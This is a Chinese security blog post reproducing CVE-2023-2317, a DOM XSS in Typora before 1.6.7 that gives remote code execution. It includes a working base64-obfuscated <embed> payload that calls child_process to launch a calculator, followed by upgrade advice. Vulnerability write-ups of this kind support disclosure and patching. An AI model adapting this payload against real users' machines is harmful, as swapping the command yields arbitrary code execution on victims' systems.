CVE-2023-2317 RCE漏洞

2024年8月22日09:04:20评论56 views字数 828阅读2分45秒阅读模式

0x01 前言

Windows和Linux版本1.6.7之前的Typora中的updater/update.html中存在基于DOM的XSS，该漏洞允许通过加载特制的markdown文件从而使得执行任意JavaScript代码。如果用户打开恶意markdown文件或者从恶意网页复制文本并将其粘贴到Typora，通过在＜embed＞标签中引用update.html，则可以利用此漏洞，此外，攻击者可以使用特权接口reqnode访问节点模块child_process并执行任意系统命令。

0x02 漏洞影响

Typora 1.6.7之前版本存在安全漏洞

Typora < 1.6.7

0x03 漏洞复现

本地环境版本1.5.12

CVE-2023-2317 RCE漏洞

EXP：

No.1 新建md文件，写入poc代码，类型为htmlNo.2 然后打开文件，即可触发payload造成RCE<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

CVE-2023-2317 RCE漏洞

success!

CVE-2023-2317 RCE漏洞

0x04 修复方案

建议及时更新版本！

原文始发于微信公众号（阿无安全）：CVE-2023-2317 RCE漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2023-2317 RCE漏洞

Gladinet漏洞CVE-2025-30406遭在野利用

安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞

Microsoft Edge信息泄露漏洞(CVE-2025-29834)

【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406）

【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

CVE-2025-27840：微型 ESP32 芯片如何破解全球比特币钱包

家装ERP管理系统SQL注入漏洞

NetMizer日志管理系统远程命令执行和SQL注入漏洞

Next.js中间件权限绕过漏洞 CVE-2025-29927

CrushFTP新安全漏洞：未授权访问和CVE-2025-31161

发表评论

在线咨询

微信